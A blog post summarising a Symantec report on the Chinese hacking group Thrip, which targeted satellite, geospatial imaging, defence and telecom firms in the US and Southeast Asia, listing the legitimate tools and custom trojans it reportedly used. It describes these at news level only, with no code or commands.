Thrip - A Chinese hackers group is targeting US and Southeast Asia !!!

Hello everyone!

    Welcome to the NewAgeInformers where we believe in sharing knowledge. Today we are going to talk about a Chinese group of hackers and their attempts to targets different Satellite and Defence Companies from United States and Southeast Asia.


    A group of Chinese hackers named "Thrip" is now a days targeting the satellite and defence companies and other telecom companies as well. They are trying to make these companies their victims who are contracting software development with the field related to the satellites, telecoms and defence sectors. This group has adopted a combination of procedure malware with legitimate system process in order to hide their actions. They used the same trick to reduce the risk of getting caught.

    A group of few security researchers from Symantec had disclosed the reemerged campaign of Thrip. After discovering they stated,"We identified three computers in China being used to launch the Thrip attacks. Thrip's motive is likely espionage and its targets include those in the communications, geospatial imaging, and defence sectors, both in the United States and Southeast Asia." In this latest campaign, they changes their methods, instead of using a single malware they used a combination of custom malware with open source tools. The purpose of using custom malware is to steal information from the infected computer which includes login credentials.

    The Chinese hackers group, Thrip's list of victims is covered by communications, geospatial imaging, and defence sectors from the United States and Southeast Asia as well. They make the production unit's of the target as their first victim to execute the malware on the computers which are used to monitor and control satellites. Their second target was the organizations or companies which deals with the geospatial mapping and imaging. They targets the operational side of the sited organizations for deployment of malware. They mainly targets those computers which are running on MapXtreme GIS (Geographic Information System) software.

    In their third round of attack, they targeted 3 distinct companies/operators from telecom sector basically located in Southeast Asia. In every attack they attacks the operational sides only. According to the researchers of Symantec, the below mentioned are the tools and malwares with their short descriptions which were used by the Thrip.

Legitimate tools abused by Thrip Hacker Group:-

PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tools was primarily used by the attackers to move laterally on the victim's network.

PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised network, and carry out reconnaissance.

Mimikatz: Freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext.

WinSCP: Open source FTP client used to ex-filtrate data from targeted organizations.

LogMeln: Cloud-based remote access software. It's unclear whether the attackers gained unauthorized access to the victim's LogMeln acounts or whether they created their own.


Custom Malware's:-

Trojan.Rikamanu:A custom Trojan designed to steal information from an infected computer, including credentials and system information.

Infostealer.Chatchamas: Based on Rikamanu, this malware contains additional features designed to avoid detection. It also includes a number of new capabilities, such as the ability to capture information from newer applications that have emerged since the original Trojan.Rikanamu malware was created.

Trojan..Mycicil: A keylogger is known to be created by underground Chinese hackers. Although publicly available, it is not frequently seen.

Backdoor.Spedear: Although not seen in this recent wave of attacks, Spedear is a backdoor Trojan that has been used by the Thrip in other campaigns.

Trojan.Syndicasec: Another Trojan used by Thrip in previous campaigns.

    That's all for today guys, see you in the next more interesting posts. To be updated and connected follow us here:     
facebook: CLICK HERE!!!!!!!!!! 

Twitter: @NewAgeInformers

Instagram: @new_age_informers_

Comments